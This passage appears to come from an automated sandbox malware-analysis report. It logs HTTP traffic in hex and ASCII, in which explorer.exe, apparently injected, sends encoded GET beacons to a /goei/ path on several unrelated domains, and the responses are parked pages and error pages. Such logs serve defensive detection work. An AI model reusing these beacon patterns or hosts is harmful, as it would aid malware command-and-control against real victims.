                                                                    Apr 8, 2021 12:46:58.951575041 CEST5610INData Raw: 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20
                                                                    Data Ascii: font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family
                                                                    Apr 8, 2021 12:46:58.951591969 CEST5611INData Raw: 5a 63 36 54 67 4b 77 31 43 5a 4c 45 58 79 47 5a 76 49 55 6a 4a 54 46 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34
                                                                    Data Ascii: Zc6TgKw1CZLEXyGZvIUjJTFLWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMt
                                                                    Apr 8, 2021 12:46:58.951605082 CEST5611INData Raw: 41 62 54 6a 45 6d 75 66 55 51 6f 51 67 41 37 52 69 72 39 61 39 68 5a 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75
                                                                    Data Ascii: AbTjEmufUQoQgA7Rir9a9hZxqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+
                                                                    Apr 8, 2021 12:46:58.951620102 CEST5613INData Raw: 64 57 72 56 38 34 7a 76 71 7a 55 70 39 38 37 66 66 4f 71 71 2b 70 6a 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a
                                                                    Data Ascii: dWrV84zvqzUp987ffOqq+pj4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS
                                                                    Apr 8, 2021 12:46:58.951636076 CEST5614INData Raw: 73 55 74 73 78 4c 45 35 68 38 53 70 70 4e 4d 66 78 35 69 6a 57 48 70 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a
                                                                    Data Ascii: sUtsxLE5h8SppNMfx5ijWHpb3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFI
                                                                    Apr 8, 2021 12:46:58.951647997 CEST5615INData Raw: 6a 66 69 63 35 33 53 6e 75 34 72 53 74 2b 48 74 59 6a 2b 4a 76 41 47 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77
                                                                    Data Ascii: jfic53Snu4rSt+HtYj+JvAGJIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2u
                                                                    Apr 8, 2021 12:46:58.951667070 CEST5617INData Raw: 49 73 56 6e 48 51 76 47 66 48 4a 59 2b 47 73 46 4f 76 65 49 61 4c 6b 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79
                                                                    Data Ascii: IsVnHQvGfHJY+GsFOveIaLkZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3
                                                                    Apr 8, 2021 12:46:58.951689959 CEST5618INData Raw: 62 61 4b 64 68 59 6b 30 71 76 4f 51 56 49 71 79 6b 70 38 72 73 6c 57 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53
                                                                    Data Ascii: baKdhYk0qvOQVIqykp8rslWKKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOY
                                                                    Apr 8, 2021 12:46:58.951697111 CEST5619INData Raw: 50 33 55 43 44 61 59 67 2f 34 41 2f 4a 38 2b 65 6d 71 41 74 30 47 53 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73
                                                                    Data Ascii: P3UCDaYg/4A/J8+emqAt0GSW9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBW
                                                                    Apr 8, 2021 12:46:59.058216095 CEST5623INData Raw: 39 79 46 49 39 70 49 64 59 71 59 66 31 4d 41 4e 36 52 49 2b 77 53 49 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37
                                                                    Data Ascii: 9yFI9pIdYqYf1MAN6RI+wSI/qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMf


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    3192.168.2.64974234.102.136.18080C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Apr 8, 2021 12:47:09.092782021 CEST6398OUTGET /goei/?EzuXh6BP=BdWs9+XwUamw8CUuz3E8yrboev7iCL3gb6z7OkS86X4CeTXY3ejv3dXKop2WOnP3DDbLLyGv2A==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.foodsystemsjusticeproject.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Apr 8, 2021 12:47:09.209527016 CEST6398INHTTP/1.1 403 Forbidden
                                                                    Server: openresty
                                                                    Date: Thu, 08 Apr 2021 10:47:09 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 275
                                                                    ETag: "606abe1d-113"
                                                                    Via: 1.1 google
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    4192.168.2.649743193.168.194.20680C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Apr 8, 2021 12:47:17.752739906 CEST6399OUTGET /goei/?EzuXh6BP=iESvN3vx+46BgVwWtoPvPQmUnTMTtp1hHS9L6erIUoS4dJlpb0oL7GpX49j9BG002Zkja/L0IA==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.batiktintaemas.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Apr 8, 2021 12:47:24.087763071 CEST6409INHTTP/1.1 301 Moved Permanently
                                                                    Connection: close
                                                                    X-Powered-By: PHP/7.2.34
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    X-Redirect-By: WordPress
                                                                    Location: http://batiktintaemas.com/goei/?EzuXh6BP=iESvN3vx+46BgVwWtoPvPQmUnTMTtp1hHS9L6erIUoS4dJlpb0oL7GpX49j9BG002Zkja/L0IA==&RL0=rVvxj02xpd_lyz
                                                                    Content-Length: 0
                                                                    Date: Thu, 08 Apr 2021 10:47:23 GMT
                                                                    Server: LiteSpeed
                                                                    Vary: User-Agent


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    5192.168.2.649749199.59.242.15380C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Apr 8, 2021 12:47:33.692498922 CEST6429OUTGET /goei/?EzuXh6BP=WHzdRAWCNmljEZUdYknMeV5zI3m+uLt35kXWxc+UN/aPGTi9DTFvtLFMQ5OC8xESdqE/mkifJw==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.addthat.xyz
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Apr 8, 2021 12:47:33.802937031 CEST6430INHTTP/1.1 200 OK
                                                                    Server: openresty
                                                                    Date: Thu, 08 Apr 2021 10:47:33 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_a7msil34EyaoVjODEDUQ2ff4sUDhxeCYFMDh2tCvLxODdKADG02BsrkHtQfUPBUVH5YKtKdN4CUGklYGwKwPLA==
                                                                    Data Raw: 65 65 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 61 37 6d 73 69 6c 33 34 45 79 61 6f 56 6a 4f 44 45 44 55 51 32 66 66 34 73 55 44 68 78 65 43 59 46 4d 44 68 32 74 43 76 4c 78 4f 44 64 4b 41 44 47 30 32 42 73 72 6b 48 74 51 66 55 50 42 55 56 48 35 59 4b 74 4b 64 4e 34 43 55 47 6b 6c 59 47 77 4b 77 50 4c 41 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
                                                                    Data Ascii: ee4<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_a7msil34EyaoVjODEDUQ2ff4sUDhxeCYFMDh2tCvLxODdKADG02BsrkHtQfUPBUVH5YKtKdN4CUGklYGwKwPLA=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one
                                                                    Apr 8, 2021 12:47:33.803009987 CEST6432INData Raw: 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 61 7a 78 2e 73 65 61 72 63 68 21 3d 3d 27 3f 7a 27 29 7b 61 7a 78 2e 68 72 65 66 3d 27 2f 3f 7a 27 3b 7d 7d 3b 44 44 2e 6f 6e 6c 6f 61 64 3d 44 44 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63
                                                                    Data Ascii: rror=function(){if(azx.search!=='?z'){azx.href='/?z';}};DD.onload=DD.onreadystatechange=function(){if(!aAC&&LU){if(!window['googleNDT_']){}LU(google.ads.domains.Caf);}aAC=true;};DT.body.appendChild(DD);return{azm:function(n$){if(aAC)n$(goog
                                                                    Apr 8, 2021 12:47:33.803033113 CEST6433INData Raw: 2c 52 72 3d 77 69 6e 64 6f 77 2c 61 7a 78 3d 52 72 2e 6c 6f 63 61 74 69 6f 6e 2c 61 41 42 3d 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2c 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 53 66 3d 44 54 2e 62 6f 64 79 7c 7c 44 54 2e 67 65 74 45 6c 65 6d 65 6e 74 73
                                                                    Data Ascii: ,Rr=window,azx=Rr.location,aAB=top.location,DT=document,Sf=DT.body||DT.getElementsByTagName('body')[0],aAy=0,aAx=0,aAz=0,$IE=null;if(Sf.className==='ie6')$IE=6;else if(Sf.className==='ie7')$IE=7;else if(Sf.className==='ie8')$IE=8;else if(Sf
                                                                    Apr 8, 2021 12:47:33.803052902 CEST6433INData Raw: 67 5f 70 64 2e 72 5f 77 68 3a 27 26 77 68 3d 27 2b 61 41 78 29 2b 0a 28 67 5f 70 64 2e 72 65 66 5f 6b 65 79 77 6f 72 64 21 3d 3d 65 66 3f 27 26 72 65 66 5f 6b 65 79 77 6f 72 64 3d 27 2b 67 5f 70 64 2e 72 65 66 5f 6b 65 79 77 6f 72 64 3a 27 27 29
                                                                    Data Ascii: g_pd.r_wh:'&wh='+aAx)+(g_pd.ref_keyword!==ef?'&ref_keyword='+g_pd.ref_keyword:'')+(g_pc.$isWhitelisted()?'&abp=1':'')+($IE!==null?'&ie='+$IE:'')+(g_pd.partner!==ef?'&partner='+g_pd.partner:'')+(
                                                                    Apr 8, 2021 12:47:33.803070068 CEST6434INData Raw: 31 31 35 0d 0a 67 5f 70 64 2e 73 75 62 69 64 31 21 3d 3d 65 66 3f 27 26 73 75 62 69 64 31 3d 27 2b 67 5f 70 64 2e 73 75 62 69 64 31 3a 27 27 29 2b 0a 28 67 5f 70 64 2e 73 75 62 69 64 32 21 3d 3d 65 66 3f 27 26 73 75 62 69 64 32 3d 27 2b 67 5f 70
                                                                    Data Ascii: 115g_pd.subid1!==ef?'&subid1='+g_pd.subid1:'')+(g_pd.subid2!==ef?'&subid2='+g_pd.subid2:'')+(g_pd.subid3!==ef?'&subid3='+g_pd.subid3:'')+(g_pd.subid4!==ef?'&subid4='+g_pd.subid4:'')+(g_pd.subid5!==ef?'&subid5='+g_pd.subid5:'');Sf.appendC


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    6192.168.2.64975085.159.66.9380C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Apr 8, 2021 12:47:38.938357115 CEST6435OUTGET /goei/?EzuXh6BP=1hbvBZ6scGrlPy0N1riO1jCdFmqX21DbBNOeXEZPJTZAL1bLTprMXMNvQ4/+FZIG6w0HvwIWjw==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.evecrude.xyz
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Apr 8, 2021 12:47:38.990061045 CEST6436INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html
                                                                    Server: Microsoft-IIS/10.0
                                                                    X-Powered-By: ASP.NET
                                                                    Date: Thu, 08 Apr 2021 10:47:16 GMT
                                                                    Connection: close
                                                                    Content-Length: 1245
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
